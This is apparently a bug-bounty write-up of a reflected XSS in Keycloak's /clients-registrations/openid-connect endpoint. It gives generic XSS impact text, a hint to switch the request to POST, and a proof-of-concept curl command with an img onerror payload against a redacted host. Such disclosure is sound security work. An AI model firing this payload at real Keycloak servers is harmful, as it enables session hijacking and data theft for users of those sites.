Write-up

XSS in keycloak Service

Bug Name :- R-XSS
Bug Priority :-  Medium
      

Bug Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Impact

The actual impact of an XSS attack generally depends on the nature of the application, its functionality and data, and the status of the compromised user. For example:

• In a brochureware application, where all users are anonymous and all information is public, the impact will often be minimal.
• In an application holding sensitive data, such as banking transactions, emails, or healthcare records, the impact will usually be serious.
• If the compromised user has elevated privileges within the application, then the impact will generally be critical, allowing the attacker to take full control of the vulnerable application and compromise all users and their data

Hints

Alays check for /clients-registrations/openid-connect If exist change the HTTP request GET to POST method

POC

curl -X POST "https://***.com:8909/clients-registrations/openid-connect" \ -d '{"<img onerror=confirm('xss_poc') src />":1}'